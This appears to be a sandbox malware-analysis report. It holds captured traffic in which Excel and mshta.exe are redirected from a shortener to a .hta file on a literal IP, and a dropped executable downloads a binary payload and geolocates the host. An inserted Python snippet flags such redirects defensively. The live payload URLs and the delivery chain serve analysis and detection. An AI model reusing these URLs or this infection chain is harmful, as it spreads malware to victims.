                                                                            Data Ascii: ol^/1.D\ #rouzCW8qnbebZI-rS+"Fw%s>yl$S?hJ;+L J:T&m?\dF%R7|Y61Bfo"\^OG#"$4+aJ+!oPE0|w!a-v+m`o\d
                                                                            Sep 30, 2024 09:56:14.719676018 CEST1236INData Raw: 7b 0e 59 9a 34 fe d6 68 a6 5d a6 14 6b 62 30 46 d5 3e 51 a9 48 2a 86 70 66 e8 7c b5 d0 14 01 d9 c4 0b be 7e 21 8b 0b 65 cb 1d df 45 d8 42 c3 83 9a e1 5e 75 7b 10 34 e3 c6 fb 94 81 96 c1 12 f6 99 74 67 82 1c d7 30 5f f5 bc 85 d7 8d 05 14 0b a5 37
                                                                            Data Ascii: {Y4h]kb0F>QH*pf|~!eEB^u{4tg0_7^Sl9sp;l}kl:Gj#^0o$#={w`z4QdH|UTxZPeayD\%?i+dpy0{:`Ez-Jj:>oD%?FG
                                                                            Sep 30, 2024 09:56:14.719687939 CEST1236INData Raw: ad ea b1 2c f3 56 8a 29 16 82 a7 07 6f 3c 90 d2 65 b5 cc 8e ba d3 d1 b6 e4 d3 f1 39 98 81 e3 66 0d 9a 1e 6e 04 b5 34 81 32 c6 dd 39 7d 8e b9 85 61 3a c4 3e 70 85 1d 6b d1 23 ed e0 88 44 34 d8 ad 5f 9a 29 84 da e4 ae 71 a9 e8 d3 73 81 4d 91 1f 7a
                                                                            Data Ascii: ,V)o<e9fn429}a:>pk#D4_)qsMzq^YpDV*^w+#`.{C;|[{0`PGrRio<RAe86inkwqKrz3XX[9wqrjN,]e$NS*0W5x
                                                                            Sep 30, 2024 09:56:14.719702959 CEST1236INData Raw: e5 f1 a7 82 eb 1b 91 5b 8a f2 e0 e2 62 24 07 a8 6f d0 99 b8 5a f7 ae 21 76 af a5 c5 e7 51 42 ae 99 1c 0e ec ca d8 6a f0 db fc ae bd 30 71 32 df 24 fc 07 e4 82 66 ea 0f d5 26 11 53 ee 43 36 e7 fe d8 90 b4 fe 82 2b f9 16 2e 9b 03 ab 19 62 83 8e 33
                                                                            Data Ascii: [b$oZ!vQBj0q2$f&SC6+.b3R2u4"Q26%!5n7x,(vQ>f<%tXzt@/$?sY,yot%I+xXi/E&*(&^%.sy2`
                                                                            Sep 30, 2024 09:56:14.724667072 CEST1236INData Raw: e5 9e 20 92 5b 3f 8d 18 d9 15 10 10 65 ec 53 f2 7e ab b4 02 29 80 0d 0f 38 25 b7 8f 7b 62 eb 2c 32 2f 8a ff f2 af 11 89 34 ab 13 3b 91 ec a1 bb 3c 49 0e 4c 30 3f 2f e0 4b b6 2b 47 bc e6 6b e6 08 b8 4b 03 30 1b 2c 4a 10 d4 c9 17 9a 06 c1 32 d3 9d
                                                                            Data Ascii: [?eS~)8%{b,2/4;<IL0?/K+GkK0,J2ClYkE%[Bo]p6HJipjSVfA+c^=P.\xi?&o2+TC2[da+9[N*Y0=`~:m"'


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49176 | 178.237.33.50 | 80 | 924 | C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
Timestamp | Bytes transferred | Direction | Data
                                                                            Sep 30, 2024 09:56:20.041296005 CEST71OUTGET /json.gp HTTP/1.1
                                                                            Host: geoplugin.net
                                                                            Cache-Control: no-cache
                                                                            Sep 30, 2024 09:56:20.741689920 CEST1170INHTTP/1.1 200 OK
                                                                            date: Mon, 30 Sep 2024 07:56:20 GMT
                                                                            server: Apache
                                                                            content-length: 962
                                                                            content-type: application/json; charset=utf-8
                                                                            cache-control: public, max-age=300
                                                                            access-control-allow-origin: *
                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                            Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.22 | 49177 | 192.3.220.22 | 80 | 3116 | C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
Timestamp | Bytes transferred | Direction | Data
                                                                            Sep 30, 2024 09:57:00.472546101 CEST179OUTGET /hFXELFSwRHRwqbE214.bin HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: 192.3.220.22
                                                                            Cache-Control: no-cache
                                                                            Sep 30, 2024 09:57:00.946851969 CEST1236INHTTP/1.1 200 OK
                                                                            Date: Mon, 30 Sep 2024 07:57:00 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                            Last-Modified: Sun, 29 Sep 2024 22:47:51 GMT
                                                                            ETag: "78c40-62349e0caa82a"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 494656
                                                                            Content-Type: application/octet-stream
                                                                            Data Raw: 4e a0 96 ff 79 3e 6e 05 34 71 21 6e e1 21 b3 d3 89 05 24 c0 68 72 32 b6 27 8a fa 2f a4 d2 30 70 b0 60 2e b2 48 53 fa 14 95 ef c8 19 07 86 19 d0 48 ef b0 c8 59 6a d5 c0 8b 6c 17 6a 57 54 63 f5 f0 c3 db 7c d2 0e db 7c d1 78 ee 47 7e a8 1f b6 d1 ae 8a d8 da bb 54 e2 ff 93 b8 ad 09 6c 87 4b a2 ed f4 5d a0 73 88 ad ae 42 80 39 24 83 72 2e 43 b0 ae 05 a8 f0 9b 12 3d 08 9b 96 8c 2d 42 27 6e c4 a5 e1 c8 12 d8 1f 30 6b 99 d6 6e d4 15 a5 92 d0 2a 76 f4 45 77 84 ef 33 2a f1 7d e7 f3 ed f8 36 f6 79 a7 25 3a 90 ff b8 f5 64 38 94 3a 3f fe ee a4 50 8c c5 d8 d3 49 21 69 83 d0 70 86 ff db 86 c5 4c d9 bb 26 3d ef 54 f3 c6 21 b3 26 60 be 03 f4 3a 08 7c 6b 8a dc 89 14 ac 86 11 35 44 93 fb 9e a6 ca b5 94 d6 be 8a 1b a2 75 2a 49 15 2f 07 e0 b9 53 a8 66 19 37 2b ad e8 42 c5 1f a9 9b 58 f4 e3 ea 38 d9 f3 17 5c 86 f4 d7 4e f4 fc 5f 6b 38 be 5d af 09 f6 37 53 44 25 2a ab 2b f4 4c b8 12 af 4c 49 e3 78 50 99 a0 c6 03 ca ee 3d 36 c3 09 41 3c ad 25 00 3e d4 f4 cb 4d 4c aa d7 de 79 35 75 e7 00 e0 5b 89 7d ed cf 20 dc c1 36 a9 a4 [TRUNCATED]
                                                                            Data Ascii: Ny>n4q!n!$hr2'/0p`.HSHYjljWTc||xG~TlK]sB9$r.C=-B'n0kn*vEw3*}6y%:d8:?PI!ipL&=T!&`:|k5Du*I/Sf7+BX8\N_k8]7SD%*+LLIxP=6A<%>MLy5u[} 6_:7dr`0qC_|_I^<D(o%dj*qJx)<,VD$9yD+<}4Ht:Qo'}u-p"=5Z}gBc?O%G^2>kiJTsToX5AJ3R0]uNL't~ahZ,z{3B*YK!TtbG4SoR>+hy]>r`?t#H%h>=+&0l.LbR13ST(u2`hN5^M%"UPA7FgMLE^NlJBQL{\(l*~hN$R-EgHg]/11ONoi|RqvAGJnDb$.1Z!v.%UBj{l0'j*v'S`}F;&RT-FfkR8^9UJs>HD%C#d
                                                                            Sep 30, 2024 09:57:00.946877003 CEST1236INData Raw: 7a c6 25 bd 9b a9 7e 31 df 9f 22 d3 d7 90 9b b7 fe 66 df 4d 36 a9 cc 83 9f d6 42 22 c3 2b cf 1d d8 62 32 05 a8 f1 7e 6d 61 82 bf 00 42 c1 5b 0f 86 af 0a d7 a5 af d3 7a ce f2 f3 24 8b 14 2c 0c 83 88 22 98 45 31 87 b8 7b 28 9c 9b 90 25 84 58 e5 ed
                                                                            Data Ascii: z%~1"fM6B"+b2~maB[z$,"E1{(%X[n~vsgsK@<$f%.I9p?@OyL`]Vb:/4]BIf<I0qji"/c=E:P69;'&Jw]!+$
                                                                            Sep 30, 2024 09:57:00.946892023 CEST1236INData Raw: 1e 20 2f a7 19 c4 4c 95 2a 49 df 97 4e 84 18 79 84 42 08 00 f5 ab c4 1b 82 c0 bf 60 d7 19 02 15 86 8d c5 e4 99 88 93 ec 4d 1e eb 6c 5f 90 24 2a b8 8b 2d ff 8e 11 16 e8 a5 ad 73 9d 64 b8 11 a4 37 2f 88 51 68 dd d7 2c 40 f0 c8 cc b2 8c 14 bc 4e 87
                                                                            Data Ascii: /L*INyB`Ml_$*-sd7/Qh,@N%q`=lv)H-DJgnZ(!,.,YBzTg0KH5z+i}33`cy;O+R..8QJjA=H!>CVyMV~!SW{2eOSHob
                                                                            Sep 30, 2024 09:57:00.946908951 CEST1236INData Raw: 1f 1e b8 27 f9 cf b4 87 79 3a b3 e5 44 82 ed 53 19 54 07 74 86 6d 5c 76 88 93 9c 5d f3 90 f7 4e c4 91 1a 9c 47 3b fb 64 53 11 d8 9a 38 c3 8e 94 40 d4 4a a1 27 c9 fa 7f 6b 1d 57 ad 6a b5 ec 6a 50 49 26 d6 e8 f4 e6 c0 57 2a 82 20 9b 9b 26 1d 5a d6
                                                                            Data Ascii: 'y:DSTtm\v]NG;dS8@J'kWjjPI&W* &ZuK!Tz8YTvganyJ_fP{$8p%=+H,.L2Ebc'(r<!y2/\ON5 "hPd]{ /%yB\j((Wln
                                                                            Sep 30, 2024 09:57:00.946919918 CEST1236INData Raw: 83 34 c5 77 2b 9d d4 43 bb 89 ec cf 36 c3 10 da be 7c 9b 34 2b eb 7b 8d e2 2c 05 5a 16 87 d0 57 13 dc 28 6e 6b d3 68 98 02 38 25 38 02 57 3e 40 6d af 30 0e fc ff c6 d2 0d 62 f4 f7 4b 52 8b 93 dd 87 0a a0 1c 42 b6 7e 09 6a 08 19 33 e7 19 c6 55 ff
                                                                            Data Ascii: 4w+C6|4+{,ZW(nkh8%8W>@m0bKRB~j3UX9yTtu(}r|K[&(?xioz/Bp{?"0X}Oaw%\D*4<$BbToCa~BeGiR0E.iLs
                                                                            Sep 30, 2024 09:57:00.946930885 CEST1236INData Raw: 46 03 f4 81 c9 6e a3 14 f6 8e 0e 81 5c f4 a7 62 7d 73 9d 5c f4 15 53 4f fe 54 9e 8b c9 78 93 e2 53 b7 91 90 dd f6 cc d5 d9 e6 65 4d 8f 8f 2e 44 fb d7 ab f6 90 79 a7 0f bc 58 1e ae 70 81 f8 f4 1e 42 d5 58 8a bb 90 43 0b df 84 f9 3a 33 0f e3 3a e4
                                                                            Data Ascii: Fn\b}s\SOTxSeM.DyXpBXC:3:1G`8O;{N!z'p\|MTGnvA[!0/Q]"v;k!J <`6s8uYBl1#JAR:C7W[W:z*o}s6lsH,,/QVe,
                                                                            Sep 30, 2024 09:57:00.946942091 CEST1236INData Raw: f8 3a fe ee 47 f9 9d 16 b4 f0 6a b1 09 23 81 5e 30 b7 17 82 6f d2 00 24 ea 9e 23 da de ab 3d 7b b8 05 88 b7 77 a0 f1 60 eb 0d b4 7a 34 f6 51 64 48 ab 7c 1b a2 55 8f a2 54 12 78 18 bf bf 5a 50 e0 65 08 61 a9 1a ec 79 db cb b1 44 5c 9d ec 25 3f 69
                                                                            Data Ascii: :Gj#^0o$#={w`z4QdH|UTxZPeayD\%?i+dpy0{:`Ez-Jj:>oD%?FGfG%w=^pTu'1&Kq|m9r.C|DdiYJ-'4YZK2.v`qSBxNJS&.d|-;k`
                                                                            Sep 30, 2024 09:57:00.946953058 CEST1236INData Raw: e7 7b cb c8 43 df d3 3b 7c 5b f2 7b 30 1a 9f 05 60 b2 50 02 df fd f2 47 72 52 02 69 6f 3c 52 86 41 a5 fb 65 b3 38 36 69 09 ed ea 6e 6b 15 86 d7 77 e0 71 89 ad 7f 4b 87 fb c2 fd f3 c4 72 9d b3 ec 8e 7a 33 c3 58 58 a7 b5 d5 5b 12 39 ef c4 77 dd 71
                                                                            Data Ascii: {C;|[{0`PGrRio<RAe86inkwqKrz3XX[9wqrjN,]e$NS*0W5xUrW{6JG&J$5-.7M qG(ywF`KK|gr4LVOg&wL9:M+ji$!wg
                                                                            Sep 30, 2024 09:57:00.946963072 CEST1224INData Raw: f5 c0 37 78 d2 2c 28 1b e7 93 ee ed c7 76 e9 de ed 08 51 3e 66 d4 3c d4 f6 25 ac 74 58 04 ff 7a b0 85 10 74 40 ff c6 01 2f 07 d5 24 c4 3f 73 59 2c 85 91 ac a8 e6 8f 14 79 87 6f d9 74 15 00 25 0c 49 2b a5 d1 8b 78 c4 85 58 e5 69 c8 2f 45 f3 b3 d7
                                                                            Data Ascii: 7x,(vQ>f<%tXzt@/$?sY,yot%I+xXi/E&*(&^%.sy2`t/#66qJ2k+o/^drjNN>m^DS}Dk"YylF3T@/wMrRgR
                                                                            Sep 30, 2024 09:57:00.946974993 CEST1236INData Raw: 5d 70 36 d5 02 48 4a ec de 18 69 70 bd 6a bd 53 90 56 8e 18 98 b5 f3 66 41 2b b9 90 63 a3 a9 d0 5e a2 06 e6 3d d8 ef ac c5 0c 1b 50 c5 bf fc 2e b9 fb f9 5c 78 e6 f8 0e 69 db f6 3f 87 26 6f b2 ce 95 ac ce 0a 32 d0 03 2b 54 ea ee e6 ae 14 97 43 02
                                                                            Data Ascii: ]p6HJipjSVfA+c^=P.\xi?&o2+TC2[da+9[N*Y0=`~:m"'n92\W{}&=5+^i[&d:Tm,aT<=mQ)#7Y.MdV_ gA(0
                                                                            Sep 30, 2024 09:57:00.951827049 CEST1236INData Raw: c1 db 83 9b 63 88 a7 e1 dc b2 22 e0 4b 0a 6d d1 44 b6 60 a6 86 d3 d4 f5 1b b8 49 08 cf b5 cf 6c 17 11 3f 5d 6f 4a 8c 43 5e 1c 22 a7 38 07 ac 9c d4 59 f3 d2 c6 c4 f1 ff 40 d3 54 6e be 73 e0 d2 ea e3 86 53 13 cc f0 ed 8f be cf 65 e7 3e bc d5 7d 29
                                                                            Data Ascii: c"KmD`Il?]oJC^"8Y@TnsSe>})CabNPK+T[M$n'b_a,/gqOv2b<?lTp}`/\8Mms/B0Imv<X9HQIBo>#7>[}}4-?-Xmj9(6


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49163 | 104.21.78.54 | 443 | 3660 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
                                                                            2024-09-30 07:53:23 UTC319OUTGET /2Rxzb3 HTTP/1.1
                                                                            Accept: */*
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: og1.in
                                                                            Connection: Keep-Alive
                                                                            2024-09-30 07:53:24 UTC817INHTTP/1.1 302 Found
                                                                            Date: Mon, 30 Sep 2024 07:53:24 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Content-Length: 77
                                                                            Connection: close
                                                                            location: http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta
                                                                            strict-transport-security: max-age=15552000; includeSubDomains
                                                                            vary: Accept
                                                                            x-content-type-options: nosniff
                                                                            x-dns-prefetch-control: off
                                                                            x-download-options: noopen
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-xss-protection: 0
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P6%2BoHQvAoZbbkkJipemOjVPMXlmXysmMLllMS2eLe%2BltoT57gFcyZ45rRulfKY3e%2FmHl%2BHsxw7XaxM6KcBVCRbOYngeuWS%2Fhkllftebjn6VgI6LyJiHqzGU%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8cb2a39539850f63-EWR
                                                                            2024-09-30 07:53:24 UTC77INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 32 2f 78 61 6d 70 70 2f 65 6e 2f 63 6f 6f 6b 69 65 6e 65 74 62 6f 6f 6b 69 6e 65 74 63 61 68 63 65 2e 68 74 61
                                                                            Data Ascii: Found. Redirecting to http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49165 | 172.67.216.244 | 443 | 3924 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
                                                                            2024-09-30 07:53:26 UTC343OUTGET /2Rxzb3 HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Language: en-US
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: og1.in
                                                                            Connection: Keep-Alive
                                                                            2024-09-30 07:53:27 UTC813INHTTP/1.1 302 Found
                                                                            Date: Mon, 30 Sep 2024 07:53:27 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Content-Length: 77
                                                                            Connection: close
                                                                            location: http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta
                                                                            strict-transport-security: max-age=15552000; includeSubDomains
                                                                            vary: Accept
                                                                            x-content-type-options: nosniff
                                                                            x-dns-prefetch-control: off
                                                                            x-download-options: noopen
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-xss-protection: 0
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hNfd60wY6QbA3Izt9Eyusb3c7lipeavc%2B7Et92kKgmq2NrUVuyg4TFCAnkIeHsFOxZQCd5E2EVcLbnLjGNAkLGHtHleiMaug56S0HjzA%2BgLohoOfNjt%2BS2g%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8cb2a3a4b960196c-EWR
                                                                            2024-09-30 07:53:27 UTC77INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 32 2f 78 61 6d 70 70 2f 65 6e 2f 63 6f 6f 6b 69 65 6e 65 74 62 6f 6f 6b 69 6e 65 74 63 61 68 63 65 2e 68 74 61
                                                                            Data Ascii: Found. Redirecting to http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49168 | 104.21.78.54 | 443 | 3660 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
                                                                            2024-09-30 07:53:44 UTC319OUTGET /2Rxzb3 HTTP/1.1
                                                                            Accept: */*
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: og1.in
                                                                            Connection: Keep-Alive
                                                                            2024-09-30 07:53:44 UTC817INHTTP/1.1 302 Found
                                                                            Date: Mon, 30 Sep 2024 07:53:44 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Content-Length: 77
                                                                            Connection: close
                                                                            location: http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta
                                                                            strict-transport-security: max-age=15552000; includeSubDomains
                                                                            vary: Accept
                                                                            x-content-type-options: nosniff
                                                                            x-dns-prefetch-control: off
                                                                            x-download-options: noopen
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-xss-protection: 0
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2FwWoyxk8gtGDVuXykl5nRNc%2BB2G8L08c0mHRjDrvjcSIG%2BHvJGHhmuqEOancALcdkhWN9VAQDCCuuMd%2Fd5%2BBd4eFPcEPFnmzJreeRIgOERpr89VKC3Ouzg%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8cb2a412ba2243d3-EWR
                                                                            2024-09-30 07:53:44 UTC77INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 32 2f 78 61 6d 70 70 2f 65 6e 2f 63 6f 6f 6b 69 65 6e 65 74 62 6f 6f 6b 69 6e 65 74 63 61 68 63 65 2e 68 74 61
                                                                            Data Ascii: Found. Redirecting to http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49169 | 104.21.78.54 | 443 | 1852 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
                                                                            2024-09-30 07:53:48 UTC343OUTGET /2Rxzb3 HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Language: en-US
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: og1.in
                                                                            Connection: Keep-Alive
                                                                            2024-09-30 07:53:49 UTC | 841 | IN | HTTP/1.1 302 Found
                                                                            Date: Mon, 30 Sep 2024 07:53:49 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Content-Length: 77
                                                                            Connection: close
                                                                            location: http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta
                                                                            strict-transport-security: max-age=15552000; includeSubDomains
                                                                            vary: Accept
                                                                            x-content-type-options: nosniff
                                                                            x-dns-prefetch-control: off
                                                                            x-download-options: noopen
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-xss-protection: 0
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=19Gcaf8YbUtGer5FFDiACGrgnFQ0i6L2BLfCsomPk3pMLImy%2Fuz8zYd6fTVDrGG7pSovfh166ig4Llhn9WSw9HsgYQuNXjKXLDglLwTmgXcgGc3%2FzNqFMBs%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8cb2a42d4f6a8c75-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-09-30 07:53:49 UTC | 77 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 32 2f 78 61 6d 70 70 2f 65 6e 2f 63 6f 6f 6b 69 65 6e 65 74 62 6f 6f 6b 69 6e 65 74 63 61 68 63 65 2e 68 74 61
                                                                            Data Ascii: Found. Redirecting to http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta
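
The hop captured above is the one a proxy log or a sandbox post-processor should single out: mshta.exe asks the og1.in shortener over HTTPS (destination port 443) and is answered with a plain-HTTP Location that points at a literal IPv4 address and an .hta file. The block below is an added example, not Joe Sandbox code: it parses the captured 302 and returns the redirect target together with the reasons a defender would flag it. The response text is reconstructed from the headers shown above (Report-To and NEL omitted, body as the server sent it); the list of script-host extensions and the reason names are this example's own assumptions.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed from the 07:53:49 UTC response captured above (Report-To/NEL omitted).
RESPONSE_302 = (
    "HTTP/1.1 302 Found\r\n"
    "Date: Mon, 30 Sep 2024 07:53:49 GMT\r\n"
    "Content-Type: text/plain; charset=utf-8\r\n"
    "Content-Length: 77\r\n"
    "Connection: close\r\n"
    "location: http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta\r\n"
    "strict-transport-security: max-age=15552000; includeSubDomains\r\n"
    "x-content-type-options: nosniff\r\n"
    "Server: cloudflare\r\n"
    "\r\n"
    "Found. Redirecting to http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta"
)

# Assumption: a short list of extensions that Windows script hosts execute directly.
SCRIPT_HOST_EXTS = (".hta", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1")


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status_code, headers, body).
    Header names are lower-cased because the server above mixes 'Date' and 'location'."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def classify_redirect(raw, requested_host):
    """Return (target, reasons) for a redirect response; an empty reasons list means
    nothing about the hop looked odd. requested_host is the Host: the client sent."""
    status, headers, body = parse_response(raw)
    if status not in (301, 302, 303, 307, 308) or "location" not in headers:
        return None, []
    target = headers["location"]
    url = urlsplit(target)
    host = url.hostname or ""
    reasons = []
    if url.scheme == "http":
        reasons.append("downgrade_to_plain_http")
    try:
        ipaddress.ip_address(host)
        reasons.append("literal_ip_host")
    except ValueError:
        pass
    if url.path.lower().endswith(SCRIPT_HOST_EXTS):
        reasons.append("script_host_payload:" + url.path.rsplit(".", 1)[-1].lower())
    if host != requested_host:
        reasons.append("cross_host_redirect")
    # A body shorter or longer than Content-Length is a sign the capture is truncated.
    if "content-length" in headers and int(headers["content-length"]) != len(body.encode()):
        reasons.append("content_length_mismatch")
    return target, reasons


if __name__ == "__main__":
    print(classify_redirect(RESPONSE_302, "og1.in"))
```

Run as-is it reports the .hta target with four reasons; the Content-Length check is there so that a truncated capture is reported rather than silently accepted.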


                                                                            Target ID:0
                                                                            Start time:03:53:01
                                                                            Start date:30/09/2024
                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                            Imagebase:0x13fb60000
                                                                            File size:28'253'536 bytes
                                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:4
                                                                            Start time:03:53:24
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\System32\mshta.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                            Imagebase:0x13f4b0000
                                                                            File size:13'824 bytes
